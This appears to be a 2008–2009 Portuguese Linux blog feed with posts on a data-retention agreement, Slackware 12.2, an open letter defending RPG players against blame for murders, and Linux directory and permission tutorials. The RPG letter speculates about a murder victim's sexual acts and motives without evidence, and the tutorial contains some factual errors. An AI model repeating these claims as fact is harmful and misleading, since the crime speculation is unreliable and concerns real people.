0x66

Mudanças

VonNaturAustreVe — Fri, 23 Jan 2009 21:40:08 +0000

Nós mudamos para

http://0fx66.com

Posted in noticia Tagged: mudanças, nova hospedagem

Termo da CPI da Pedofilia é assinado sem discussão pública

VonNaturAustreVe — Sat, 27 Dec 2008 04:30:26 +0000

Hi,blz?

Recentemente vi um post no br-linux, que me abriu os olhos para alguns fatos.

Vamos inicialmente a noticia:

“Assinatura do termo de mútua cooperação

As operadoras Oi, Brasil Telecom e TIM assinaram na quarta-feira (17) um “termo de mútua cooperação” elaborado pela Comissão Parlamentar de Inquérito (CPI) da Pedofilia.

O texto do documento, não divulgado publicamente antes de sua assinatura e ainda com circulação limitada – em formato PDF escaneado -, prevê a transferências de “dados de conexão” por “fornecedores de conteúdo e serviços de interativo” sem autorização judicial, assim como a manutenção dos chamados “logs de conexão” por três anos.

O termo é diferente do “Projeto Azeredo” sobre cibercrimes, que não cria responsabilidades para fornecedores de conteúdo. Há ainda prazos limite para o fornecimento da informação, que pode chegar a duas horas se houver “risco iminente à vida de criança ou adolescente”. Mas quem define se há “risco iminente à vida” quando não há necessidade autorização judicial? E por que a vida de “criança ou adolescente” é a única que o termo se propõe a proteger? Aparentemente a vida vale menos após o 18º aniversário.

Algumas das partes mais polêmicas do termo têm sua aplicação incerta porque, dentro de 60 dias, será formada uma Comissão de Acompanhamento e Prevenção. Essa comissão tem o poder de arbitrar a respeito de “casos omissos” do termo. Para a criação do regimento interno, a organização não-governamental Safernet terá a mesma quantidade de representes que todos os provedores de internet: um. Também haverá um representante de todos os Ministérios Públicos estaduais, um do MPF, um das operadoras de telefonia fixa, um das operadoras de telefonia móvel, um dos fornecedores de conteúdos e serviços e, por fim, um da PF, totalizando oito integrantes, totalizando oito responsáveis pela criação do regimento.

Quem e quantas pessoas exatamente participarão da Comissão, e como vão trabalhar, será definido por esse grupo.

O parágrafo referente aos dados cedidos sem autorização judicial é um dos que ainda terão detalhes especificados por essa comissão. O mesmo grupo ainda vai “discutir a eficácia” das medidas, ou seja: aprova-se o documento primeiro, verifica-se se ele é eficaz depois.

O conteúdo das comunicações telemáticas é protegido por ordem judicial. O termo exige que “fornecedores de conteúdo ou serviços de interatividade” armazenem toda a informação veiculada por pelo menos seis meses. Em tese, isso significa que aquele post que você fez em um blog, mas depois apagou, vai ficar seis meses nos servidores e está disponível caso alguém venha a requisitá-lo judicialmente. Não existe nada comparável no “PL Azeredo”, que ainda aguarda votação na Câmara.

O texto do termo ainda tem outros problemas e contradições. No parágrafo terceiro da cláusula quinta, os provedores são obrigados a garantir que os dados fornecidos correspondem aos armazenados em seus sistemas. Porém, o inciso II do parágrafo único na cláusula décima diz que “as empresas signatárias não são responsáveis pela veracidade das informações fornecidas por seus usuários”. Logo, basta às operadoras a propagação de uma mentira em vez de garantir a veracidade da informação.

A multa, no caso de descumprimento, varia de R$ 5 mil a R$ 25 mil reais (“PL Azeredo”: R$ 2 mil a R$100 mil). E se o número de solicitações for muito grande e o provedor não conseguir atendê-los a tempo? O texto do documento prevê isso, porém só “será considerado ‘volume mensal elevado’ o que [exceder] em trinta por cento a média de solicitações feitas nos três meses precedentes”. Dessa maneira, se as solicitações crescerem ordenadamente, qualquer número alto não será “elevado”.

Constam no documento assinaturas do Ministério Público Federal, da Polícia Federal, do Comitê Gestor da Internet e da Safernet Brasil. Oi e Brasil Telecom são responsáveis pela telefonia fixa e, por extensão, pela internet ADSL em todos os estados no Brasil, menos São Paulo. Isso significa que todos os usuários de internet ADSL dessas operadoras estarão sujeitos ao texto do termo, embora ele não seja “lei”. Claro, Telefônica e Vivo já se pronunciaram que também assinarão o termo.

Proteger as crianças é uma atitude nobre, assim como é também proteger a vida de qualquer ser humano, independentemente da idade. A atenção à criança e ao adolescente chega a um ponto em que é preciso questionar por que não há menção a outros casos e se esse “foco” não é apenas uma maneira de evitar questionamentos da proposta, dado a passionalidade que acompanha estes assuntos. Por exemplo, o termo pede que as empresas alterem seus contratos para permitir sua rescisão no caso de crimes contra crianças. Por acaso crimes contra adultos não são suficientes para rescisão de contrato?

Os prazos para o fornecimentos dos dados começam a valer somente 360 dias após a assinatura do termo. Até lá, talvez, todos já esqueceram do termo, cujo prazo de vigência é indeterminado.”

1º Fato

Não é muito mais muito estranho um acordo desses ser feito assim a portas fechadas?será que esse acordo foi feito tão perto do natal e ano novo só para que ninguém perceba que está sendo feito um acordo desses?
2º Fato

Por que será que fizeram um acordo para que os dados sejam entregues sem autorização judicial?

3º Fato

Vão realmente atrás dos pedifilos?ou os pedofilos são apenas um bode expiatório,será que não iria acontecer igual com o trafego de drogas?apreende-se algumas gramas mais deixam passar toneladas pelas costas e fingem que nem estão vendo…

Agora peço que realmente reflitam sobre isso.

Fonte da Noticia

Link com o acordo de mutua cooperação

[]’s

Posted in Artigos, noticia, Outros Tagged: CPI, internet, leis, liberdade, noticias, pedofilia, políticos, privacidade, revolta

Slackware 12.2

VonNaturAustreVe — Thu, 11 Dec 2008 17:03:40 +0000

Hi,blz?

Após algum tempo meio longe do blog resolvi voltar a ativa,tive alguns problemas pessoais(malditas mulheres,com elas problemas é sem elas mais problemas ainda)mais enfim to de volta reativando o blog.

Um noticia até boa foi lançado ontem dia 10 o Slackware 12.,não pude testa-lo ainda mais já estou baixando :).

Segue abaixo a nota oficial de lançamento.

“Yes folks, ’tis the season to announce a new release of Slackware. With a shiny new kernel, many package updates, and the newly added ability to install from a Samba share, we bring to you the latest in the stable Slackware 12.x series. Slackware 12.2 ships with the 2.6.27.7 Linux kernel, the Xorg 1.4.2 X server (with many driver, library, and application updates), Xfce 4.4.3, KDE 3.5.10, simplified wired and wireless networking with wicd in /extra, package upgrade management with slackpkg moved into the main tree, support for non-usb-storage digital cameras through libgphoto2, pm-utils (tools to support suspend and hibernate through HAL), and much, much more. This release brings the system up-to-date without compromising stability or compatibility with the 12.x series.

More details may be found in the official announcement.

If you like Slackware, please consider supporting the project by picking up a copy of Slackware 12.2 from the Slackware Store. The discs are off to replication now and pre-orders are being accepted for the official 6 CD or 1 DVD set. Also by popular demand, we now have black T-shirts with the original Slackware logo for sale. Check ‘em out!

Thanks are due to the Slackware crew, the developers of slackbuilds.org, the fine folks on linuxquestions.org, IRC, and everyone else who pitched in to help make this another great Slackware release. We couldn’t have done it without your help.

As always — have fun!

Pat and the Slackware crew”

Longa vida ao grande slackware o/

Link oficial sobre o anuncio

Links para o dvd full(via torrent)

[]’s

Posted in linux, noticia, resenhas Tagged: free software, linux, news, noticia, open source, slack, slackware, slackware 12.2, software livre

RPG INOCENTE

VonNaturAustreVe — Wed, 19 Nov 2008 03:37:49 +0000

O RPG não influenciou NENHUM crime no Brasil

Carta aberta à mídia.

Peço a todos os jogadores de RPG que copiem este texto em seus blogs, sites, flogs, comunidades do orkut e onde mais puderem, pois não seremos mais usados como bodes expiatórios por delegados ineficazes, pastores evangélicos, vereadores oportunistas e jornalistas incompetentes.
O texto abaixo dá nome aos bois: às vítimas, aos assassinos e aos oportunistas que usaram os crimes para se promoverem. Chega de notícias distorcidas, incompletas e tendenciosas.

TERESÓPOLIS
Em 14 e 20 de Novembro de 2000, na cidade de Teresópolis (RJ), duas garotas de 14 (Iara dos Santos Silva) e 17 (Fernanda Venâncio Ramos) anos foram estupradas, torturadas e estranguladas com um intervalo de seis dias entre os crimes.
Sônia Ramos, 42, madrasta de Fernanda, a segunda vítima, levantou em um texto a suspeita de que as atrocidades pudessem estar ligadas ao jogo e que o RPG conduziria ao crime, porque sua filha (a VÍTIMA, que NÃO jogava RPG) andava na companhia de outros garotos que jogavam GURPS e Vampiro (sua alegação se baseou no fato de que sua filha andava as voltas “com pessoas que se fantasiavam de vampiros”).
Inclusive a polícia chegou a prender injustamente um jogador de RPG, que não vou falar o nome porque o coitado era inocente e não merece ter seu nome publicado, mas que passou quatro dias na cadeia por causa deste absurdo.
O verdadeiro assassino das garotas foi preso após o 5o crime, depois da prisão do RPGista; era um cigano e NUNCA sequer passou perto de um livro de RPG.
A imprensa irresponsável, assim como no caso famoso da “Escolinha Base”, foi muito rápida em divulgar versões fantasiosas sobre o “jogo da morte”, mas NUNCA publicou uma linha sequer se desculpando com os 400.000 jogadores de RPG que foram ofendidos em sua moral e prejudicados diante da sociedade.

OURO PRETO
No dia 10 de outubro de 2001, Aline Silveira Soares viajou do Espírito Santo com sua prima e alguns colegas para Ouro Preto para participar da “Festa do Doze”, que é uma espécie de Carnaval fora de hora entre as faculdades da região, com R$40,00 e a roupa do corpo para passar três dias.
Segundo o laudo, Aline consumiu drogas durante o dia anterior ao de sua morte. Esta informação foi confirmada por diversas testemunhas que também participavam da festa, em Ouro Preto (testemunhas que foram solenemente ignoradas pelo delegado Adauto Corrêa após as investigações tomarem o rumo circence). Aline não tinha dinheiro e acreditou que conseguiria fugir do traficante sem pagar pela droga que consumiu, mas no dia de sua morte (14 de Outubro de 2001), foi abordada pelo criminoso no caminho de volta para a república onde estava hospedada (o cemitério fica exatamente no meio do trajeto entre o local da festa e a república). Testemunhas (que também foram ignoradas no inquérito oficial) disseram ter visto Aline conversar com um conhecido traficante da cidade na porta do cemitério algumas horas antes de sua morte.
De acordo com especialistas em crimes relacionados a drogas, Aline provavelmente teria se oferecido para ter relações sexuais com o traficante para pagar a dívida, pois as roupas da garota foram encontradas “cuidadosamente dobradas e dispostas ao lado do local do crime, sem nenhum indício de violência ou de coerção”. Aline tomou o cuidado de deixar suas sobre uma das lápides, dobradas com a jaqueta por baixo, para que não sujassem.
Ainda segundo o laudo oficial da perícia técnica, durante a primeira facada que Aline recebeu, o corpo estava na posição acocorada, popularmente conhecida como “de quatro”. Segundo especialistas em crimes de estupro, o traficante provavelmente teria tentado obrigar Aline a realizar sexo anal, que possivelmente foi rejeitado pela garota, resultando no primeiro golpe com a faca. O traficante, tendo ferido Aline seriamente, não viu alternativa a não ser terminar de matá-la. Para disfarçar, o assassino colocou o corpo de Aline em posição deitada sobre a lápide (pelas fotos da perícia e rastros de sangue, pode-se atestar que o corpo foi movido APÓS a sua morte) para tentar atrapalhar as investigações.

Quando o corpo foi encontrado, os policiais começaram as investigações pelos locais em que Aline se hospedou e em uma das repúblicas foram encontrados alguns livros de RPG, que o delegado, evangélico confesso, classificou como “material satanista”. A partir disto, um vereador oportunista chamado Bentinho Duarte (sem partido) viu nisso uma chance de se promover realizando terrorismo psicológico e, junto com o Promotor Fernando Martins (conhecido por ter tentado proibir a distribuições de jogos como Duke Nuken e Carmagedon), moveu ação contra as empresas Devir Livraria e Daemon editora tentando a proibição de 3 títulos (Vampiro: a Máscara, Gurps Illuminati e Demônios: a Divina Comédia).

Resumindo: um crime que não teve nada a ver com RPG, mas sim com DÍVIDA DE DROGAS resultou até agora na prisão de 4 garotos injustamente (que NÃO são jogadores de RPG, fato comprovado pela mãe da vítima em depoimento ao vivo na rede Bandeirantes de TV) e um completo show de aberrações e absurdos na mídia.

GUARAPARI
Polícia Civil do Espírito Santo prendeu, na noite de 12 de Maio de 2005, dois acusados pelo assassinato do aposentado Douglas Augusto Guedes, da mulher dele, a corretora de imóveis Heloísa Helena Andrade Guedes, e do filho do casal Tiago Guedes, em Guarapari. Os corpos dos três foram encontrados amarrados e deitados em camas no dia 5 de maio. Na mesma data, eles foram sepultados.
O delegado da Divisão de Homicídios de Guarapari, Alexandre Linconl, evangélico, disse ao Portal Terra que os assassinos MAYDERSON DE VARGAS MENDES, 21 anos, e RONALD RIBEIRO RODRIGUES, 22, confessaram que eles mataram a família motivados pelo jogo, mas essa “confissão” não ocorreu imediatamente após o crime.
O crime que Mayderson e Ronald cometeram é o de LATROCÍNIO QUALIFICADO E PREMEDITADO, ou seja, mataram para roubar de uma maneira cruel e sem dar chance de defesa às vítimas, com premeditação. Esse é um crime hediondo, sendo julgado e condenado diretamente por um juiz criminal. Ambos os acusados já tinham ficha criminal (ambos estão respondendo processo por Porte ilegal de Arma)
O que o advogado de defesa da dupla estava fazendo era alegar que eles cometeram o crime influenciado pelo jogo e, com essa ação, tentar reverter o crime para Homicídio Simples, baseado no tal jogo que ninguém sabe o que é. Com isso, os assassinos iriam para um júri popular, que poderia ser muito bem influenciado por todo esse novo circo que a mídia sensacionalista armou e, jogando a culpa em cima do RPG, poderia até inocentar os “pobres coitadinhos vítimas do jogo” Mayderson e Ronald…
O que tem de ficar bem claro é o seguinte: os criminosos entraram na casa, apontaram armas para Tiago e sua família, doparam a família sob a mira do revólver, levaram o garoto até o caixa eletrônico onde roubaram R$ 4.000,00 de sua poupança e depois executaram friamente a família com tiros na cabeça, para não serem reconhecidos. A história do “RPG” só apareceu dois dias depois que os assassinos foram capturados pela polícia, sob orientação do advogado de defesa da dupla.
É bom lembrar, já que a mídia “esqueceu”, que, graças à intervenção da Daemon Editora e da conversa de Marcelo Del Debbio, escritor especialista em Role Playing Games, com o delegado de Guarapari ao vivo em uma entrevista na Rede Bandeirantes de TV, o advogado de defesa da dupla abandonou o caso, deixando os dois criminosos sem advogado à espera de um defensor público.

Com estes textos, podemos começar a nos defender dos três falsos “crimes do RPG”. Já está na hora destas informações serem passadas para jornalistas sérios que queiram nos ajudar a fazer a verdade aparecer.

Abraços fraternais

Fonte

Posted in Outros Tagged: boatos, jornalismo, mídia, rpg, rumores, teoria da conspiação, verdade

Entendendo as estruturas e diretórios

VonNaturAustreVe — Tue, 24 Jun 2008 21:26:03 +0000

Entendendo as estruturas e diretórios

Num sistema Linux geralmente temos uma estrutura de diretórios um pouco complexa. Os arquivos ali dispostos, a princípio, parecem estar jogados aleatoriamente nos diversos diretórios existentes. Mas, felizmente, há uma certa ordem e uma lógica fazendo com que cada diretório do sistema tenha uma finalidade específica.
Antes de irmos entender os diretórios precisamo dar uma pincelada e algumas informações uteis,que serão bem uteis em breve e também ajuda a entender o motivo dos diretórios(caso você esteja querendo ser um desenvolvedor ou e um).

Sistema de Arquivos

Sistema de arquivos é a forma que o sistema operacional usa para representar determinada informação em um espaço de armazenagem. É o método de identificar e indexar as informações que estão armazenadas em qualquer mídia: disquetes, discos rígidos, drives em memória, CDs, etc.

Quando se prepara um disco para o trabalho através do processo de formatação física, criam-se os meios magnéticos necessários para armazenar os dados. Este processo faz uma preparação do dispositivo de armazenagem para que ele possa receber um sistema de arquivos e futuramente os dados do usuário. Um sistema de arquivos, portanto, é necessário para manter padrões, para controlar o tamanho das partições, permissões de arquivos, tamanho dos arquivos e sua organização, entre muitas outras funções.

Será visto primeiramente quais os principais tipos de sistemas de arquivos que existem e que são criados em um processo de formatação:

ext: sistema de arquivos estendido (extended filesystem). É o sistema de arquivos mais utilizado no Linux. Existem ramificações (ext2 e ext3), sendo o ext3 o mais amplamente utilizado pela comunidade Linux atualmente. Ele fornece padrões para arquivos regulares, diretórios, arquivos de dispositivos, links simbólicos e suporte a transações (journalling), entre outras características avançadas.

vfat: este é o sistema de arquivos (volume FAT) dos sistemas Windows®9x e Windows NT®.

ntfs: este é o sistema de arquivos dos sistemas Windows2000®, Windows XP® e NT®, entre outros.

nfs: sistema de arquivos de rede, utilizado para acessar diretórios de máquinas remotas, que permite o compartilhamento de dados na rede.

reiserfs: sistema de arquivos com suporte a características como, por exemplo, melhor performance para diretórios muito grandes e suporte a transações (journalling).

iso9660: sistema de arquivos do CD-ROM.

hpfs: sistema de arquivos do OS/2®.]

continuando…..

Primeira coisa com que você precisa se habituar é que no Linux os discos e partições não aparecem necessariamente como unidades diferentes, como o C:, D:, E: do Windows. Tudo faz parte de um único diretório, chamado diretório raiz(root) ou simplesmente “/”.
Dentro deste diretório temos não apenas todos arquivos e as partições de disco, mas também o CD-ROM, drive de disquete e outros dispositivos, formando a estrutura que você vê no gerenciador de arquivos.

/bin - é o diretório que contém o mínimo necessário para funcionar e poder ser manuseado pelo administrador. Serão necessárias ferramentas que se encontram em outros diretórios para que a máquina fique operacional. A maioria dos programas possui o seu arquivo executável neste diretório.

/boot – contém informações para o gerenciador de inicialização do sistema. É aqui que normalmente fica o arquivo contendo o kernel da máquina e informações para o carregador do sistema operacional.

/cdrom – Não é propriamente um diretório, mas sim um link para o diretório /media/cdrom (ponto de montagem do dispositivo leitor de CD/DVD da máquina;

/dev – é o local onde ficam armazenadas as referências aos dispositivos presentes na máquina, para o controle destes dispositivos. Esse diretório contém apontadores para, por exemplo, o drive de disquetes, os discos da máquina, terminais virtuais, portas de acesso seriais e paralelas, etc. Os controladores são automaticamente criados durante a instalação do sistema e posteriormente podem ser criados através do comando MAKEDEV.

devfs – contém todos arquivos-dispositivos, inclusive para dispositivos que não existem no computador e irá ocupar espaço em disco.
udev – utilizado a partir do kernel 2.6.12, não ocupa espaço em disco e contém somente os arquivos-dispositivos dos devices presentes na máquina.

/etc – é um dos mais importantes diretórios da máquina. Nele ficam a maioria dos arquivos de configuração e manipulação dos serviços essenciais ao sistema, a maioria dos arquivos de configuração de acesso a rede e de comunicação, arquivos de configuração do Sistema de Janelas X, arquivos de configuração do idioma do sistema, de atualizações, enfim, de muitas funcionalidades da máquina.

/home – contém os diretórios pessoais dos usuários e suas configurações(funciona como a pasta Meu Documentos,no windows).

/lib – é o diretório onde ficam as bibliotecas básicas do sistema. Elas são compartilhadas por diversos programas, principalmente os que se encontram no diretório raiz.

/mnt – é o diretório utilizado para o acesso a dispositivos de mídia, como disquetes e CD-ROM. Ele é utilizado como ponto de montagem para a maioria destes dispositivos.

/proc- Não é bem um diretório. Trata-se de um filesystem virtual, cheio de arquivos virtuais, que na verdade são apenas referências dinâmicas dos procedures (procedimentos) do Kernel Linux, que são alteradas constantemente durante a utilização do sistema; fornece informações sobre o kernel e sobre os processos que estão rodando no momento, além de informações sobre a utilização de alguns dispositivos. Alguns parâmetros do kernel podem ser alterados diretamente nesses arquivos, fazendo com que as modificações passem a valer imediatamente. Esse diretório não ocupa espaço nenhum em disco e as informações ali presentes são geradas apenas quando solicitadas.

/root - Esse é o diretório do superusuário do sistema (pode chamar de administrador se quiser, mas não perto de mim, pois me lembra do termo usado por outro sisteminha (semi)operacional proprietário do qual não gosto muito ;-)). O único usuário do sistema com permissão para realizar qualquer modificação no sistema. Aí você me pergunta: “Mas gmazk, se é uma pasta de usuário, porque não está dentro de /home ?”. E eu explico: conforme você vai ver na minha próxima publicação (a respeito de planejamento do particionamento da maquina e instalação do sistema), é conveniente durante a instalação do sistema, determinar que o diretório /home seja montado em uma partição separada da partição principal (onde estão os demais diretórios do sistema). Se o diretório root estivesse nessa partição separada (dentro de /home) e ocorresse com essa partição, o que costumo chamar de um “momento PUTZ… ferrou!”, a pasta /root também estaria inacessível, e como você já sabe, certas coisas só podem ser feitas no sistema pelo usuário root… Então você não poderia, por exemplo, inicializar o sistema para realizar uma recuperação nessa partição;

/opt – Se verificar o conteúdo deste diretório, MUITO provavelmente ele estará vazio. A idéia inicial deste diretório era armazenar programas que não fizessem parte da distribuição GNU/Linux instalada em seu sistema, porém, esse método de separação quase não é utilizado; Ele pode ser útil por questões de espaço.

/sbin contém ferramentas de interesse do superusuário e que geralmente são usadas por serviços básicos da máquina. Ficam nesse diretório programas como os responsáveis pela carga de módulos do kernel, ativação e interrupção das interfaces de rede, manutenção dos sistemas de arquivos e outras atividades.

/srv – É um diretório que sofre do mesmo problema de esquecimento e solidão que o diretório opt, pois não é utilizado nunca… A idéia inicial era usá-lo para armazenar dados que seriam disponibilizados por qualquer programa servidor que você utilizasse no sistema, mas foi outra idéia que “não pegou”;

/sys – O nome vem do sysfs (sys filesystem). É o diretório usado pelo Kernel Linux para manter dados atualizados sobre os dispositivos de hardware da máquina (não confunda, não é a mesma coisa que /dev, já que no /dev estão arquivos que servem de ligação com os dispositivos, e não informações sobre eles);

/tmp serve como repositório para arquivos temporários, sendo utilizado para programas que são executados após a ativação do sistema, ou seja, este diretório serve como espaço extra para vários programas e aplicações.

/var - Contém arquivos que são modificados com o decorrer do uso do sistema (e-mail , temporários, filas de impressão, manuais).

Dentro do /var encontramos:

/var/lib - Bibliotecas que mudam enquanto o sistema está rodando.
/var/local – Arquivos variáveis de programas que estão rodando.
/var/lock – Travas para indicar que um programa está utilizando um determinado dispositivo.
/var/log – Arquivos de log do sistema (erros, logins, etc..)
/var/run – Arquivos importantes ao sistema úteis até o próximo boot (atualizações de softwares e kernel).
/var/spool – Diretório de filas de impressão, e-mail e outros
/var/tmp – Arquivos temporários dos programas
/var/catman – Um cache para manuais que são formatados na hora de serem utilizados.

O diretório /usr

Este e um diretório interessante que preciso explicar melhor.O que tem nele?Contém os arquivos das ferramentas e dos aplicativos do usuário.

/usr bin :Contém ferramentas e aplicativos de cada usuário.Ao criar uma nova conta de usuário,o sistema cria automaticamente uma pasta /usr/bin
/usr dict :Diretório que são armazenados os dicionários(o nome dict deriva do inglês dictionary) e as listas de termos do usuário.
/usr/doc :Esse Diretório contem a documentação do sistema em uso.
/usr/info :Nesse Diretório encontramos os arquivos para o sistema GNU info,baseado em hipertextos
/usr/lib :Assim como o Diretório /bin da raíz contem as bibliotecas para execução das ferramentas,dessa vez,porem,trata-se dos componentes das ferramentas,dessa vez,porem,trata-se dos componentes das ferramentas que se encontram no Diretório /usr/bin
/usr/local :Essa pasta contem arquivos locais,ou seja,exclusivos para cada sistema(ou aplicativo),que incluem documentação(/usr/local/doc)e os programas em si(/usr/local/bin).
/usr/man :diretório que agrupa os manuais que podem ser lidos com o comando man.
/usr/share :Contém arquivos e componentes compartilhados por vários aplicativos.Nesse Diretório,encontramos diversos subdiretórios com arquivos de ajuda,ícones,etc.
/usr/src : Esse diretório contem o codigo-fonte(source)dos softwares disponiveis no sistema. Esses sources podem ser visualizados e alterados livremente.
/usr/tmp :E o diretório em que são colocacos os arquivos temporários gerados pelo usuário ativo.

Comandos do Sistema de Arquivos

Aqui estão os comandos para lidar com o sistema de arquivos (HDs, drives e partições de rede).

badblocks – Utilizado para encontrar defeitos físicos no HD.
cfdisk – Similar ao fdisk só que com uma interface melhorada.
df – Mostra o espaço livre no disco.
dosfsck Verifica e repara sistemas FAT do DOS.
du – Mostra o espaço que ocupa um diretório e os arquivos internos.
dump – Usado para fazer o backup de um sistema ext2. O complemento deste comando é o restore.
dumpe2fs – Faz o backup de blocos do HD e grupos.
e2fsck – Verifica um volume ext2 em busca de erros.
e2label – Muda o nome de uma partição ext2.
fdisk – Usado para criar, editar e apagar partições no HD.
fdformat – Formata um disquete.
mount – Usado para “montar” um sistema de arquivos. O complemento deste comando é o umount.
restore – Usado para restaurar um sistema ext2.
umount – Desmonta o sitema de arquivos. O complemento é o comando mount.
cdrecord – Grava CDs.
cdparanoia – Grava CDs de audio.

Manipulação de arquivos e diretórios

cd – Muda para um diretório. Se você não especificar nada ele muda para seu diretório HOME.
chmod – Muda as permissões para acesso aos arquivos e diretórios (Escrita, Leitura, etc..)
chown – Muda o propritário e grupo de um arquivo ou diretório.
chgrp – Muda o grupo de um arquivo ou diretório.
cp – Copia os arquivos de um diretório/pasta para outro diretório/pasta.
dir – Lista o conteúdo de um diretório (preferir o comando “ls”).
find – Procura arquivos com determinadas características na árvore de diretórios.
ln – Cria um link simbólico para um arquivo.
ls – Lista os arquivos de um diretório.
mc – Midinght Commander. Um gerenciador de arquivos completo para o console.
mkdir – Cria um diretório.
mv – Move ou renomeia um arquivo.
rm – Exclui arquivos.
rmdir – Exclui um diretório vazio.
vdir – Lista o conteúdo de um diretório.
wheris – Localiza o executável, código fonte e manual de um comando.
ghomemover_console – Programa escrito por Daniel Brooke Peig que faz a mudança de diretórios alterando as referências a arquivos.

Referencias:
http://www.guiadohardware.net/dicas/linux-entendendo-arvore-diretorios.html
http://www.danbp.org/linuxcom.html
http://www.conectiva.com/doc/livros/online/10.0/servidor/pt_BR/ch02.html

Permissões de Arquivos UNIX

VonNaturAustreVe — Tue, 24 Jun 2008 15:33:40 +0000

.—————————-.
| Permissões de Arquivos UNIX `———————————————–,
| Por MELEU atualizado em 08/2007 |
`—————————————————————————–’- = < Í N D I C E > = -0. Intro
0.1. Changelog
0.2. ToDo

1. Identificações

2. Permissões de Arqvivos
2.1. Permissões Básicas
2.2. Permissões Especiais

3. Sobre Alguns Comandos
3.1. chmod
3.2. ls
3.3 find
3.4. test
3.5. umask
3.6. chattr
3.7. Outros Comandos4. Usando C
4.1. Informações sobre Arquivos
4.2. Mudando Permissões5. Esquemas Úteis6. Referências7. Considerações FinaisApêndice. Arquivos de Dispositivo

——————————————————————————-

0. Intro
^^^^^

Como vocês podem ver isso é assunto bem NewBie mesmo, arrisco dizer que
é um assunto de Wannabe Newbie. Só estou escrevendo sobre isto pois quando
precisei saber detalhes sobre permissões de arquivos não encontrei nada em
português que me ajudasse muito (confesso que não procurei muito :P ).
E pode ser que esse texto venha a ajudar alguém numa consulta rápida sobre
determinada permissão…
Se você já é aquele fuçador tarimbado pode ser que você não encontre
nenhuma novidade na parte que descrevo as permissões, porém a parte que
envolve C pode ser de alguma utilidade. ;)
E se você é elite, com certeza já sabe o conteúdo daqui e não vai
querer perder seu precioso tempo…

Agradecimentos: Nash (por tudo), module (aindo vou morar na sua casa), eSc2
(vulgo Escape Duplo), xf (se pedir por favor eu até faço :P ), Blind_Bard
(e nossa partida de D&D?!), Hekodangews (quer aprender, saia do IRC), klogd
(pela companhia nas altas madrugadas :) ), hts (pela dica do pulltheplug),
Zarro (simplesmente por ter vontade de aprender e correr atrás), Cs0 (meleca
é você seu bundão! :P ) a minha namorada (por não reclamar de eu ficar horas
na frente do PC e por não me decepcionar debaixo dos lençóis :-) ), ao pessoal
da extinta mail list unsekurity (cuja participação foi fundamental para a
realização deste texto, me tiraram algumas dúvidas), a um cara chamado Ademar
(por ter dado uma lida no texto e ter me dado uns toques
legais), e a todos que ajudam a comunidade fuçadora (e que eu esqueci de
mencionar) e não deixam que ela suma!

0.1. Changelog
———

08/2007:
~~~~~~~
-> Corrigida a seção mais importante do texto: Referências

-> Corrigida a informação de que o bash ignora o suid nele mesmo

-> Correção da descrição do sticky bit em arquivos.

-> Inserida a seção 3.5. umask.

-> Inserida a seção 3.6. chattr.

-> Correção de alguns erros bobos.

07/2002:
~~~~~~~
-> Correção de erros de português e acentuação das palavras;

-> Correção de algumas informações erradas, incompletas, e/ou mal
explicadas, como por exemplo a parte que falo sobre C (agora está mais
organizadinho).

-> Os códigos agora estão entre as tags do Phrack Extraction Utility;

-> Inclusão da seção 1 “Identificações”;

-> Inclusão da seção 5 “Esquemas Úteis” (bem bacaninha!).

0.2. ToDo
—-

Coisas que faltam no texto para que eu o julgue completo:

-> Falar sobre o comando chattr;

-> Incluir informações sobre ACL’s (antes eu preciso aprender mais sobre isso);

-> Falar sobre outras system calls que têm alguma relação com permissões de
arquivo e manipulação de ID.

——————————————————————————-

1. Identificações
^^^^^^^^^^^^^^

Cada usuário cadastrado no sistema possui dois números relacionados ao seu
login. Um é o UID (User IDentification) e o outro é o GID (Group
IDentification). Isso é porque o UNIX não considera o nome do usuário para
determinar suas permissões, ele só trabalha com números, neste caso o UID e
o GID ou em outros casos o EUID (Efective User IDentification).
Você pode ver os ID’s de um usuário digitando (adivinha!) “id” no prompt.

/* -=-=-= exemplo =-=-=- */
root@meleu:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
/* -=-=-= exemplo =-=-=- */

Você deve ter reparado que o UID do root é 0. Qualquer pessoa (não
interessa o seu username) que tiver UID 0 terá PERMISSÃO TOTAL no sistema,
ou seja, nível de super-usuário. Sempre que eu falar neste texto “nível de
super-usuário” eu estou querendo dizer “UID igual a 0″. Cada username
cadastrado no sistema precisa de um, e somente um, UID.
Dá pra ver também que o root faz parte de vários grupos. Logo concluímos
que um usuário pode ter vários GID’s, quer dizer, um usuário pode pertencer
a vários grupos.

Além destes dois há também o EUID. Este é usado com arquivos que
contenham permissões especiais (explicadas no tópico 2.2). Você vai entender
sobre EUID quando ler sobre arquivos com SUID, mais adiante.

——————————————————————————-

2. Permissões de Arqvivos
^^^^^^^^^^^^^^^^^^^^^^

Primeiro devemos saber que todas as informações sobre os arquivos vêm de
uma estrutura chamada inode. O inode contém informações sobre o UID e GID
do arquivo, as permissões do arquivo, o tipo do arquivo e o timestamp
do arquivo (informações sobre a última modificação, último acesso, etc).
Para ver o número do inode de um arquivo basta um “ls -i”.

Também devemos saber que as permissões possuem 3 “níveis”:

+ Proprietário: só pode ser exatamente 1, o dono do arquivo;
+ Grupo: engloba todos os membros de um determinado grupo;
+ Outros: se refere a qualquer pessoa que não seja o proprietário e que não
pertença ao grupo.

O proprietário de determinado arquivo/diretório é responsável pelas suas
permissões de acesso.

Basta um “ls -l” para ver as permissões, o dono do arquivo e o grupo.
Vamos a um exemplo:

/* -=-=-= exemplo =-=-=- */
meleu:~$ ls -l
total 28
drwxr-xr-x 5 meleu users 4096 Jul 25 10:26 GNUstep/
drwxrwx— 2 meleu staff 4096 Dec 22 06:58 myprogs/
-rw-r–r– 1 meleu users 4163 Nov 16 06:43 rfc1244.txt
drwxr-xr-x 2 meleu staff 4096 Dec 28 16:09 mylibs/
-rw——- 1 meleu users 1074 Dec 12 04:37 anotações.txt
drwxr-x— 6 meleu users 4096 Dec 28 16:12 textos/
/* -=-=-= exemplo =-=-=- */

Note que todos os arquivos pertencem a “meleu” e uns arquivos pertencem ao
grupo “users” enquanto outros pertencem ao grupo “staff”
As permissões são mostradas de fato depois do primeiro caracter de cada
linha, e sempre na sequência “rwx”. O esquema é o seguinte, os 3 primeiros
caracteres após o primeiro descrevem as permissões do proprietário do arquivo;
os 3 seguintes dizem respeito ao grupo; e os 3 últimos são referentes aos
outros (que não seja o proprietário e nem pertença ao grupo). Note que em
determinados itens aparece um ‘d’ antes das permissões, isso significa que
isto é um diretório (outros tipos são explicados no tópico 3.2.).

2.1. Permissões Básicas
——————

